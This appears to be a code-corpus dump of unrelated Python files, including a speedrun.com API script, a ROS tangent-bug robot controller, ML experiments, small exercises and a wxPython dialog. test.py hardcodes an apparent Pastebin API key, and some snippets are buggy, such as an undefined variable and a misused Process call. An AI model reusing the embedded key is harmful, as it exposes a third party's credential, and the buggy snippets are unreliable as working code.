\n \n '''\n\n return html_string","sub_path":"report/nonfarm_payroll.py","file_name":"nonfarm_payroll.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"48367019","text":"import json\nimport requests\nimport datetime\nimport pprint\nfrom Pastebin import PastebinAPI\n\nPASTEKEY = '4d150744923e05e1eb047ec0f613fe28'\n\n\ndef command_runner(msg, PASTEKEY):\n x = PastebinAPI()\n data = 'data'\n user = msg[1]\n games = []\n runtimes = []\n runplaces = []\n runcats = []\n rungames = []\n runstrlist = [['Game', 'Category', 'Place', 'Time']]\n i = 1\n runner = requests.get('http://www.speedrun.com/api/v1/users?name=%s' % user)\n rjs = json.loads(runner.text)\n try:\n rjs['data']\n except:\n print('No runner found with that name.')\n return(None)\n id = rjs[data][0]['id']\n name = rjs[data][0]['names']['international']\n pbs = requests.get('http://www.speedrun.com/api/v1/users/%s/personal-bests?embed=game,category' % id)\n pbjs = json.loads(pbs.text)\n runs = pbjs[data]\n for run in runs:\n gamename = run['game']['data']['names']['international']\n if gamename not in games:\n games.append(gamename)\n gamestr = ', '.join(games[:5])\n fullgamestr = ', '.join(games)\n for run in runs:\n run['game']['data']['names']['international'] = run['game']['data']['names']['international'].lower()\n time = run['run']['times']['primary_t']\n runtime = str(datetime.timedelta(seconds=time))\n runtimes.append(runtime)\n runplaces.append(str(run['place']))\n runcats.append(run['category']['data']['name'])\n rungames.append(run['game']['data']['names']['international'])\n i = i+1\n print(runstr)\nmsg = ['!runner', 'stinkycheeseone890', '']\ncommand_runner(msg, PASTEKEY)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"519531817","text":"import pika\nfrom flask import Flask\n\nfrom facade import queue_name\nfrom multiprocessing import Process, Manager\nglobal total_str1\ntotal_str1 = list()\napp = Flask(__name__)\n\n\ndef consume(final_list):\n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n channel = connection.channel()\n channel.queue_declare(queue=queue_name)\n def callback_(ch, method, properties, body):\n print(\" [x] Received {}\".format(body))\n final_list.append(str(body))\n channel.basic_consume(queue=queue_name, on_message_callback=callback_, auto_ack=True)\n channel.start_consuming()\n\n@app.route('/', methods=['GET'])\ndef message_f():\n\n print(\" \".join(total_str1))\n return \" \".join(total_str1)\n\n\nif __name__ == \"__main__\":\n\n \n manager = Manager()\n final_list = manager.list()\n p1 = Process(target=consume, args=(final_list,))\n p1.start()\n \n total_str1 = final_list\n p2 =Process( app.run(port=5010))\n p2.start()\n\n\n","sub_path":"lab6/message1.py","file_name":"message1.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96539095","text":"# !/usr/bin/env python\n# coding:utf-8\n# Author: Caojian\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimg = plt.imread('./a.jpg')\nimg_tinted = img * [1, 0, 0] #rgb\nplt.subplot(1, 2, 1) #1行2列的第一个\nplt.imshow(img)\nplt.subplot(1, 2, 2) #1行2列的第二个\nplt.imshow(img_tinted)\nplt.show()\n","sub_path":"人工智能/python3/源码/p44_matplotlib.py","file_name":"p44_matplotlib.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"371454777","text":"# to_do_list = [\"0\" for _ in range(10)]\n# command = input()\n# while not command == \"End\":\n# data = command.split(\"-\")\n# importance = int(data[0])\n# action = data[1]\n# to_do_list.remove(\"0\")\n# to_do_list.insert(importance, action)\n# command = input()\n# result = [el for el in to_do_list if el != \"0\"]\n# print(result)\n\n############################### РЕШЕНИЕ ЙОРДАН ДЖАМБАЗОВ от предишния fund ##########################################################\n\ntasks = []\n\nwhile True:\n command = input()\n if command == \"End\":\n break\n tokens = command.split(\"-\")\n priority = int(tokens[0])\n task = tokens[1]\n tasks.append((priority, task))\n\n\ntasks_in_priority = [task_name for priority, task_name in sorted(tasks)]\nprint(tasks_in_priority)","sub_path":"python_fundamentals_september 2020/05. lists_advanced/01. lab/02. todo_list.py","file_name":"02. todo_list.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"316874859","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pickle\nimport networkx as nx\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport sys\nfrom IPython.display import clear_output\nimport os\nfrom math import floor\n\n# In[2]:\n\n\nwith open('output_data/utils.p', 'rb') as f :\n utils = pickle.load(f)\nG70 = utils['G70']\nG100 = utils['G100']\nINVTHRESHOLDINT = utils['INVTHRESHOLDINT']\ndef isInv(inv):\n return inv > INVTHRESHOLDINT\ndef isVent(v):\n return 0 < v < INVTHRESHOLDINT\nventures = [v for v in G70.nodes() if v INVTHRESHOLDINT]\n\nventures100 = [v for v in G70.nodes() if v INVTHRESHOLDINT]\n\n\n# In[3]:\n\n\ndef isCandidate(G70, v, i) :\n if isVent(i) or isInv(v):\n print(\"Not in good order\")\n return (i not in G70[v]) and (v not in G70[i])\n\ndef isTarget(G70, G100, v, i):\n if isVent(i) or isInv(v):\n print(\"Not in good order\")\n return isCandidate(G70,v,i) and G100.has_edge(v,i) or G100.has_edge(i,v)\n\ndef predict(G, v, i, THRESHOLD, SCORETYPE, existing_edges_, verify=False) :\n if verify and (v,i) in existing_edges_:\n print(\"not candidate\")\n return;\n if SCORETYPE=='random' :\n return random.random() > THRESHOLD\n \n if SCORETYPE == 'pref' :\n return G70.degree(v)*G70.degree(i) > THRESHOLD*51910\n \ndef fast_predict_pref(G, v, i, THRESHOLD) : \n return G70.degree(v)*G70.degree(i) > THRESHOLD*51910\n \ndef put_inv_on_right(set_of_links):\n S = set()\n r = 0\n n=0\n for v,i in set_of_links:\n if v > INVTHRESHOLDINT:\n S.add((i,v))\n r+=1\n else :\n S.add((v,i))\n n+=1\n return S\n\nexisting_edges = set(put_inv_on_right(G70.edges()))\nexisting_edges_100 = set(put_inv_on_right(G100.edges()))\ntarget_edges = existing_edges_100 - existing_edges\n\n\n# In[4]:\n\n\nfrom time import time\ndef print_BLABLA(data) :\n with open('output_data/utils.p', 'rb') as f :\n utils = pickle.load(f)\n\n def print_TPFPTNFN(utils_, ventures, THRESHOLD, printing=False, fore_string = \"\"):\n TP = 0\n FP = 0\n FN = 0\n TN = 0\n G100 = utils_['G100']\n G70 = utils_['G70']\n INVTHRESHOLDINT = utils_['INVTHRESHOLDINT']\n investors = [i for i in G70.nodes() if i> INVTHRESHOLDINT]\n existing_edges = set(put_inv_on_right(G70.edges()))\n existing_edges_100 = set(put_inv_on_right(G100.edges()))\n target_edges = existing_edges_100 - existing_edges\n del G100, existing_edges_100\n Nv = len(ventures)\n IT = 0\n for v in ventures :\n for i in investors :\n if (v,i) not in existing_edges :\n if fast_predict_pref(G70, v, i, THRESHOLD) :\n if (v,i) in target_edges:\n TP +=1\n else :\n FP +=1\n else:\n if (v,i) in target_edges:\n FN +=1\n else :\n TN +=1\n\n recall = 0 if not(TP+FN) else TP / (TP + FN)\n precision = 0 if not(TP+FP) else TP / (TP + FP)\n F1 = 0 if not(precision+recall) else 2*(precision*recall)/(precision+recall)\n return TP, FP, TN, FN, recall, precision, F1\n \n return print_TPFPTNFN(utils, data['ventures'], data['THRESHOLD'], printing=not(data['pid']), fore_string= data['pid'])\n\n\n\n\n# In[ ]:\n\n\nfrom multiprocessing import Pool\n\n\nK=int(sys.argv[1])\nTHRESHOLDS = [0.02, 0.04, 0.06,0.08, 0.1, 0.2] #[0.0001, 0.0002,0.0003,0.0004,0.0006,0.0008,0.0010, 0.002,0.003,0.006,0.01]\n\n\nprint(\"Running with cores : \" , K)\nresults=[]\nfor THRESHOLD in THRESHOLDS:\n t0 = time()\n ventures_split = [{'ventures':ventures[i::K], 'pid':i, 'THRESHOLD':THRESHOLD} for i in range(K)]\n print(\"Running for Threshold :\", THRESHOLD)\n if __name__ == '__main__':\n p = Pool(K)\n results.append(p.map(print_BLABLA, ventures_split))\n print(time()-t0, \"secondes\")\n pickle.dump(results[-1], open(\"output_results/results{0}.p\".format(THRESHOLD), \"wb\"))\n","sub_path":"optimized_computation/predx2.py","file_name":"predx2.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"67333083","text":"# insert ../ directory\n# import os\n# import sys\n# _ = os.path.abspath(os.path.abspath(__file__) + '/../../')\n# if _ not in sys.path:\n# sys.path.insert(0, _)\nfrom mxnet import nd\n\n\ndef bn_checker(BNs):\n params = []\n for bn in BNs:\n params.append(bn.params.get('running_mean').data().copy())\n \n def compare():\n nparams = []\n diff = 0.\n print('p, b {} {}'.format(params[0][0], BNs[0].params.get('running_mean').data()[0]))\n for param, bn in zip(params, BNs):\n nparam = bn.params.get('running_mean').data()\n diff += nd.sum(nd.abs(nparam - param)).asscalar()\n return diff\n return compare\n\n\nclass BNControl(object):\n \"\"\"\n only support renet18 by me now.\n \"\"\"\n @staticmethod\n def collect_BN(blocks):\n BN = []\n for blk in blocks:\n _type = str(blk).split('(')[0]\n if _type == 'BatchNorm':\n BN.append(blk)\n elif _type == 'Residual':\n BN.extend([blk.bn1, blk.bn2])\n return BN\n \n def __init__(self, blocks, use_batch=True):\n self.bns = BNControl.collect_BN(blocks)\n self.use_batch = use_batch\n self.data_list = []\n \n def store(self):\n if self.use_batch: # use batch data and no change running mean/std\n if len(self.data_list) == 0:\n for i, bn in enumerate(self.bns):\n self.data_list.append(bn.params.get('running_mean').data().copy())\n self.data_list.append(bn.params.get('running_var').data().copy())\n else:\n for i, bn in enumerate(self.bns):\n self.data_list[2*i][:] = bn.params.get('running_mean').data()\n self.data_list[2*i+1][:] = bn.params.get('running_var').data()\n else: # no use batch data and no change running mean/std\n for i, bn in enumerate(self.bns):\n self.data_list.append(bn._kwargs['use_global_stats'])\n bn._kwargs['use_global_stats'] = True\n \n def load(self):\n if self.use_batch:\n for i in range(len(self.bns)):\n bn, mean, std = self.bns[i], self.data_list[2*i], self.data_list[2*i+1]\n bn.params.get('running_mean').set_data(mean)\n bn.params.get('running_var').set_data(std)\n else:\n for i in range(len(self.bns)):\n bn, data = self.bns[i], self.data_list[i]\n bn._kwargs['use_global_stats'] = data\n\n\nclass ResNetBNControl(BNControl):\n \"\"\"\n test on Resnet18_v1 and Resnet50_v1\n \"\"\"\n def collect_BN(self, blocks):\n BN = []\n for blk in blocks:\n _type = str(blk).split('(')[0]\n if _type == 'BatchNorm':\n BN.append(blk)\n elif _type == 'Residual':\n BN.extend([blk.bn1, blk.bn2])\n elif _type == 'HybridSequential' or _type == 'Sequential':\n BN.extend(self.collect_BN(blk))\n elif _type in ['BasicBlockV1', 'BottleneckV1']:\n BN.extend(self.collect_BN(blk.body))\n if hasattr(blk, 'downsample') and blk.downsample is not None:\n BN.extend(self.collect_BN(blk.downsample))\n return BN\n \n def __init__(self, blocks, use_batch=True):\n if isinstance(blocks, list):\n self.bns = []\n for block in blocks:\n self.bns.extend(self.collect_BN(block))\n else:\n self.bns = self.collect_BN(blocks)\n self.use_batch = use_batch\n self.data_list = []","sub_path":"build/lib/MPUtils/umxnet/backgrad/BNControl.py","file_name":"BNControl.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"421977636","text":"import numpy as np\n\nfrom keras.datasets import cifar10\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.optimizers import RMSprop\nfrom keras.utils import np_utils\n\n# function to read in and process the cifar-10 data\ndef load_data():\n (X_train, y_train), (X_test, y_test) = cifar10.load_data()\n X_train = X_train.reshape(50000, 3072)\n X_test = X_test.reshape(10000, 3072)\n X_train = X_train.astype('float32')\n X_test = X_test.astype('float32')\n X_train /= 255\n X_test /= 255\n # take only first 3 classes\n X_train = X_train[(y_train < 3).reshape(50000)]\n y_train = y_train[(y_train < 3).reshape(50000)]\n X_test = X_test[(y_test < 3).reshape(10000)]\n y_test = y_test[(y_test < 3).reshape(10000)]\n # convert class vectors to binary class matrices\n Y_train = np_utils.to_categorical(y_train, 3)\n Y_test = np_utils.to_categorical(y_test, 3)\n return X_train, Y_train, X_test, Y_test\n\n# copy the first nlayers of model 'model' and freeze\n# them. Note that these are layers in the keras sense,\n# that is, it counts a drop-out layer or activation layer\n# as an actual layer\ndef copy_freeze_model(model, nlayers = 1):\n new_model = Sequential()\n for l in model.layers[:nlayers]:\n l.trainable = False\n new_model.add(l)\n return new_model\n\n# read in the dataset\n(X_train, Y_train, X_test, Y_test) = load_data()\n\n\n\n# 4. Autoencoder layers\nmodel = Sequential()\nfor i in range(4):\n hdn = 32 * pow(4, i)\n model.add(Dense(hdn, input_shape=(3072,)))\n model.add(Activation('relu'))\n model.add(Dropout(0.2))\n\n model.add(Dense(3072))\n # model.add(Activation('softmax'))\n\n rms = RMSprop()\n model.compile(loss='mse', optimizer=rms)\n # model.fit(X_train, Y_train, batch_size=32, nb_epoch=1, verbose=1,\n # show_accuracy=True, validation_split=0.2)\n # print('Autoencoder r: %d\\nClassifcation rate %02.3f\\n\\n' % (\n # hdn, model.evaluate(X_test, Y_test, show_accuracy=True)[1]))\n model.fit(X_train, X_train, batch_size=32, nb_epoch=25, verbose=1,\n show_accuracy=True, validation_split=0.2)\n\n # pre - x_train)**2\n\n print('Autoencoder r: %d\\nClassifcation rate %02.3f\\n\\n' % (\n hdn, model.evaluate(X_test, X_test, show_accuracy=True)[1]))","sub_path":"ws362_pset06/pset0604.py","file_name":"pset0604.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224776732","text":"class Solution(object):\n def findLadders(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: List[str]\n :rtype: List[List[str]]\n \"\"\"\n\n from collections import defaultdict\n wordmap = defaultdict(list) # wordmap = {'lo*': ['lot', 'log'], ...}\n for word in wordList:\n for i,c in enumerate(word):\n key = word[:i] + '*' + word[i+1:]\n wordmap[key].append(word)\n\n\n def bfs(start, end, dic, wordmap, distance):\n from collections import deque\n queue = deque([start])\n distance[start] = 0\n while queue:\n curr = queue.popleft()\n currdist = distance[curr]\n for i,c in enumerate(curr):\n key = curr[:i] + \"*\" + curr[i+1:]\n for next in wordmap[key]:\n if next not in distance:\n distance[next] = 1 + currdist\n queue.append(next)\n else:\n distance[next] = min(distance[next], 1 + currdist)\n\n\n def dfs(start, end, dic, wordmap, distance, solution, result):\n solution.append(start)\n if end == start:\n result.append(solution[:])\n else:\n for i,c in enumerate(start):\n key = start[:i] + \"*\" + start[i+1:]\n for next in wordmap[key]:\n if distance[next] == distance[start] +1:\n dfs(next, end, dic, wordmap, distance, solution, result)\n\n solution.pop()\n\n def helper(start, end, wordmap, distance, solution, result, dic):\n dic.add(start)\n bfs(start, end, dic, wordmap, distance)\n dfs(start, end, dic, wordmap, distance, solution, result)\n return solution\n\n\n dic = set()\n distance = {}\n solution = []\n result = []\n helper(beginWord, endWord, wordmap, distance, solution, result, dic)\n return result\n\n\nbeginWord = \"a\"\nendWord = \"c\"\nwordList = [\"a\",\"b\",\"c\"]\n\nbeginWord = \"hit\"\nendWord = \"cog\"\nwordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]\n\nS = Solution()\nprint(S.findLadders(beginWord, endWord, wordList))\n","sub_path":"datastructures_algorithms/Graph/Graph-WordLadder-II.py","file_name":"Graph-WordLadder-II.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548720013","text":"# Define a procedure, fibonacci, that takes a natural number as its input, and\r\n# returns the value of that fibonacci number.\r\n\r\n# Two Base Cases:\r\n# fibonacci(0) => 0\r\n# fibonacci(1) => 1\r\n\r\n# Recursive Case:\r\n# n > 1 : fibonacci(n) => fibonacci(n-1) + fibonacci(n-2)\r\n\r\ndef fibonacci(n):\r\n\tif n == 0:\r\n\t\treturn n\r\n\tif n == 1:\r\n\t\treturn n\r\n\treturn fibonacci(n-1) + fibonacci(n-2)\r\n\r\n\r\ndef fibfor(n):\r\n\tcurrent = 0\r\n\tafter = 1\r\n\tfor i in range(0,n):\r\n\t\tcurrent, after = after, current + after\r\n\treturn current\r\n\r\ndef fibcount(n):\r\n\tfiblst = []\r\n\ts = []\r\n\tfor i in range(0,n):\r\n\t\tfiblst.append([fibfor(i),i-1])\r\n\tfor t in range(0,n):\r\n\t\ts.append(fiblst[i][0])\r\n\tprint(fiblst)\r\n\t# print(sum(fiblst))\r\n\r\nfibcount(10)\r\nfibcount(11)\r\nfibcount(12)\r\nfibcount(13)\r\nfibcount(14)\r\nfibcount(15)\r\n\r\n\r\n# print(fibfor(0), \" vs \", fibonacci(0))\r\n# print(fibfor(5), \" vs \", fibonacci(5))\r\n# print(fibfor(15), \" vs \", fibonacci(15))\r\n\r\n\r\n#print fibonacci(0)\r\n#>>> 0\r\n#print fibonacci(1)\r\n#>>> 1\r\n# print (fibonacci(15))\r\n#>>> 610","sub_path":"Python Udacity/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350327961","text":"# There is only 9,1 are neon numbers between 1 to n\nA = int(input(\"Enter a num to check a neon or not\"))\nX = A**2\narr = []\nfor i in str(X):\n arr.append(i)\nsum = 0\nfor j in arr:\n sum = sum + int(j)\nprint(sum)\nif sum == A:\n print(f\"{A} is a neon num\")\nelse:\n print(f\"{A} is not a neon num\")","sub_path":"python_basics_01.py/Neon_num.py","file_name":"Neon_num.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465629455","text":"#!/usr/bin/env python\n\nimport rospy\nimport tf\nimport math\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\nfrom geometry_msgs.msg import Vector3\nfrom std_msgs.msg import UInt32\n\n# max range is the artificial value used as the maximum range of the laser scanner\nmaxRange = 3.0\n\n# determines if the robot can see the goal directly\ngoalVisible = 0\n\n# threshold that determines if a point in the laser scan is a discontinuity\ndiscThresh = 3.0\n\nscan = LaserScan()\n\ndef scanUpdate(lScan):\n\tglobal scan\n\tscan = lScan\n\ndef tangentbug():\n\tglobal goalVisible\n\tglobal scan\n\tgoalfromlaser = rospy.Publisher('robot_2/robot2goal',Twist,queue_size=10)\n\trobotController = rospy.Publisher('robot_2/cmd_vel',Twist,queue_size=10)\n\n\tlistener = tf.TransformListener()\n\trate = rospy.Rate(1.0)\n\twhile not rospy.is_shutdown():\n\t\ttry:\n\t\t\t# trans is a list of 3 elements x,y,z of the transform. rot is a list of\n\t\t\t# 4 elements of the quaternion for the transform\n\t\t\t(trans,rot) = listener.lookupTransform('robot2/trueOdom','robot2/goal',rospy.Time(0))\n\t\t\ttwi = Twist()\n\t\t\ttwi.linear.x = trans[0]\n\t\t\ttwi.linear.y = trans[1]\n\t\t\ttwi.linear.z = trans[2]\n\t\t\t#ignore angular orientations since we only care about getting to the goal position\n\t\t\ttwi.angular = Vector3(0.0,0.0,0.0)\n\t\t\t\n\t\t\tcontrol = Twist()\n\t\t\tcontrol.linear = Vector3(0.0,0.0,0.0)\n\t\t\tcontrol.angular = Vector3(0.0,0.0,0.0)\n\t\t\tangle2goal = math.atan2(trans[1],trans[0])\n\n\t\t\tsensorIndex = int((angle2goal-scan.angle_min)/scan.angle_increment)\n\n\t\t\t# check if we can see the goal directly. Move towards it if we can\n\t\t\tif (scan.ranges[sensorIndex] >= maxRange):\n\t\t\t\tgoalVisible = 1\n\t\t\t\tif (angle2goal > 0):\n\t\t\t\t\tcontrol.linear.x = 0.3\n\t\t\t\t\tcontrol.angular.z = 0.2\n\t\t\t\telif (angle2goal < 0):\n\t\t\t\t\tcontrol.linear.x = 0.3\n\t\t\t\t\tcontrol.angular.z = -0.2\n\t\t\t\telse:\n\t\t\t\t\tcontrol.linear.x = 0.3\n\t\t\t\t\tcontrol.angular.z = 0.0\n\t\t\telse:\n\t\t\t\tgoalVisible = 0\n\n\t\t\t# if we can't see the goal directly, check for the best direction of travel\n\t\t\tif goalVisible == 0:\n\t\t\t\tbestAngle = 0.0\n\t\t\t\tbesti = 0\n\t\t\t\tbestDist = 10000.0\n\t\t\t\trealAngle = 0.0\n\n\t\t\t\tfor i in range(len(scan.ranges)):\n\t\t\t\t\t# check for discontinuties within a specified threshold\n\t\t\t\t\tif (i>0) and (abs(scan.ranges[i]-scan.ranges[i-1]) > discThresh):\n\t\t\t\t\t\t# output the index for the discontinuity and the angle value and the distance to that discontinuity\n\t\t\t\t\t\tdiscDist = scan.ranges[i]\n\t\t\t\t\t\tif discDist==float('Inf'):\n\t\t\t\t\t\t\tdiscDist = scan.range_max\n\t\t\t\t\t\tdAng = scan.angle_min + i * scan.angle_increment\n\t\t\t\t\t\txDist = discDist * math.sin(dAng)\n\t\t\t\t\t\tyDist = discDist * math.cos(dAng)\n\t\t\t\t\t\theurDist = math.sqrt((twi.linear.x-xDist) ** 2 + (twi.linear.y-yDist) ** 2)\n\t\t\t\t\t\tif ((heurDist + discDist) < bestDist):\n\t\t\t\t\t\t\tbestDist = heurDist + discDist\n\t\t\t\t\t\t\tbestAngle = dAng\n\t\t\t\t\t\t\tbesti = i\n\n\t\t\t\t# drive towards the best heuristic or turn towards it if we're not facing it already\n\t\t\t\tif ((bestAngle) > 0):\n\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\tcontrol.angular.z = 0.3\n\t\t\t\telif ((bestAngle) < 0):\n\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\tcontrol.angular.z = -0.3\n\t\t\t\telse:\n\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\tcontrol.angular.z = 0.0\n\n\t\t\t\t# prioritize avoiding obstacles\n\t\t\t\tif (besti > 90) and (besti < (len(scan.ranges)-90)):\n\t\t\t\t\tif scan.ranges[besti+20] < 2.0:\n\t\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\t\tcontrol.angular.z = 0.5\n\t\t\t\t\telif scan.ranges[besti-20] < 2.0:\n\t\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\t\tcontrol.angular.z = -0.5\n\t\t\t\telif (besti > 90) and (besti < (len(scan.ranges)-90)):\n\t\t\t\t\tif scan.ranges[besti+30] < 2.0:\n\t\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\t\tcontrol.angular.z = 0.5\n\t\t\t\t\telif scan.ranges[besti-30] < 2.0:\n\t\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\t\tcontrol.angular.z = -0.5\n\n\t\t\t# if obstacles are too close to the robot, prioritize avoiding them\n\t\t\tj = int(len(scan.ranges)/2) - 70\n\t\t\tm = int(len(scan.ranges)/2) - 10\n\t\t\tk = int(len(scan.ranges)/2) + 70\n\t\t\tn = int(len(scan.ranges)/2) + 10\n\n\t\t\tfor i in range(j,m):\n\t\t\t\tif (scan.ranges[i] < 2.5):\n\t\t\t\t\tcontrol.linear.x = 0.0\n\t\t\t\t\tcontrol.angular.z = 0.5\n\t\t\tfor i in range(n,k):\n\t\t\t\tif (scan.ranges[i] < 2.5):\n\t\t\t\t\tcontrol.linear.x = 0.0\n\t\t\t\t\tcontrol.angular.z = -0.5\n\n\t\t\t# stop moving if we're close enough to the goal\n\t\t\tif math.sqrt((twi.linear.x) ** 2 + (twi.linear.y) ** 2) < 0.5:\n\t\t\t\tcontrol.linear.x = 0.0\n\t\t\t\tcontrol.linear.y = 0.0\n\t\t\t\t\n\t\t\trobotController.publish(control)\n\t\t\tgoalfromlaser.publish(twi)\n\t\texcept (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n\t\t\tcontinue\n\n\trate.sleep()\n\nif __name__ == '__main__':\n try:\n \trospy.sleep(2.0)\n \trospy.init_node('tf_robot2_tbug')\n \trospy.Subscriber(\"robot_2/base_scan\",LaserScan,scanUpdate)\n \ttangentbug()\n \trospy.spin()\n except rospy.ROSInterruptException: pass","sub_path":"src/tangentbug2.py","file_name":"tangentbug2.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394502104","text":"\"\"\"\nDescription: \nRequirements: pySerial, wxPython Phoenix\n\nglossary and of other descriptions:\n\nDMM - digital multimeter\nPSU - power supply\nSBC - single board computer\n\nINS - general instrument commands\n\nGEN - general sequence instructions\n\n\"\"\"\n\nimport wx\nimport theme\nimport base\n# from wx.lib.agw import spinctrl\n\n\nclass StringCompare(wx.Dialog):\n\n def __init__(self, parent, variables):\n \n wx.Dialog.__init__(self,\n parent,\n title=\"String Compare\")\n \n self.operations = [\"+\",\"-\",\"*\",\"/\",\"^\",\"(\",\")\"]\n self._variables = variables\n \n panel = wx.Panel(self) \n sizer = wx.BoxSizer(wx.VERTICAL)\n \n hsizer = wx.BoxSizer(wx.HORIZONTAL)\n sbox = wx.StaticBox(panel, label=\"\") \n sbox_sizer = wx.StaticBoxSizer(sbox, wx.HORIZONTAL)\n grid = wx.GridBagSizer(5,5)\n \n row = 0\n lbl_var1 = wx.StaticText(panel, label=\"variables:\")\n grid.Add(lbl_var1, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=2)\n \n choices = variables[\"locals\"]\n for var in variables[\"globals\"]:\n if var in choices:\n continue\n choices.append(var) \n choices = sorted(choices)\n \n cbox_vars1 = wx.ComboBox(panel, choices=choices, name=\"var1\", style=wx.CB_READONLY) \n cbox_vars1.Bind(wx.EVT_COMBOBOX, self.OnVarSelected) \n grid.Add(cbox_vars1, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2) \n \n row += 1\n lbl_var1 = wx.StaticText(panel, label=\"var1 = \")\n self.text_var1 = wx.TextCtrl(panel, value=\"\")\n self.text_var1.Bind(wx.EVT_TEXT, self.OnVarTextChange)\n grid.Add(lbl_var1, pos=(row,0), flag=wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTRE, border=2)\n grid.Add(self.text_var1, pos=(row,1), span=(0,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 1 \n self.chk_literal = wx.CheckBox(panel, label=\"Is literal?\")\n self.chk_literal.SetValue(0)\n grid.Add(self.chk_literal, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n sbox_sizer.Add(grid, 1, wx.ALL|wx.EXPAND, 0)\n \n #-----\n \n sbox = wx.StaticBox(panel, label=\"\") \n sbox_sizer2 = wx.StaticBoxSizer(sbox, wx.HORIZONTAL)\n grid2 = wx.GridBagSizer(5,5)\n \n row = 0\n lbl_var2 = wx.StaticText(panel, label=\"variables:\")\n grid2.Add(lbl_var2, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=2)\n \n cbox_vars2 = wx.ComboBox(panel, choices=choices, name=\"var2\", style=wx.CB_READONLY) \n cbox_vars2.Bind(wx.EVT_COMBOBOX, self.OnVarSelected) \n grid2.Add(cbox_vars2, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 1\n lbl_var2 = wx.StaticText(panel, label=\"var2 = \")\n self.text_var2 = wx.TextCtrl(panel, value=\"\")\n self.text_var2.Bind(wx.EVT_TEXT, self.OnVarTextChange)\n grid2.Add(lbl_var2, pos=(row,0), flag=wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTRE, border=2)\n grid2.Add(self.text_var2, pos=(row,1), span=(0,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 1 \n self.chk_literal2 = wx.CheckBox(panel, label=\"Is literal?\")\n self.chk_literal2.SetValue(1)\n grid2.Add(self.chk_literal2, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n sbox_sizer2.Add(grid2, 1, wx.ALL|wx.EXPAND, 0)\n \n hsizer.Add(sbox_sizer, 1, wx.ALL|wx.EXPAND, 0)\n hsizer.Add(sbox_sizer2, 1, wx.ALL|wx.EXPAND, 0)\n \n # -----\n sbox = wx.StaticBox(panel, label=\"Pass/Fail\") \n sbox_sizer3 = wx.StaticBoxSizer(sbox, wx.HORIZONTAL)\n grid3 = wx.GridBagSizer(5,5)\n \n row = 0\n lbl_test = wx.StaticText(panel, label=\"Test:\") \n self.cbox_var_x = wx.ComboBox(panel, choices=[\"var1\",\"var2\"], value=\"var1\", style=wx.CB_READONLY)\n self.cbox_cond = wx.ComboBox(panel, choices=[\"==\",\"!=\"], value=\"==\", style=wx.CB_READONLY)\n self.cbox_var_y = wx.ComboBox(panel, choices=[\"var1\",\"var2\"], value=\"var2\", style=wx.CB_READONLY)\n grid3.Add(lbl_test, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=2)\n grid3.Add(self.cbox_var_x, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n grid3.Add(self.cbox_cond, pos=(row,2), flag=wx.ALL|wx.EXPAND, border=2)\n grid3.Add(self.cbox_var_y, pos=(row,3), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 1 \n self.chk_match = wx.CheckBox(panel, label=\"Match case\")\n self.chk_match.SetValue(1)\n 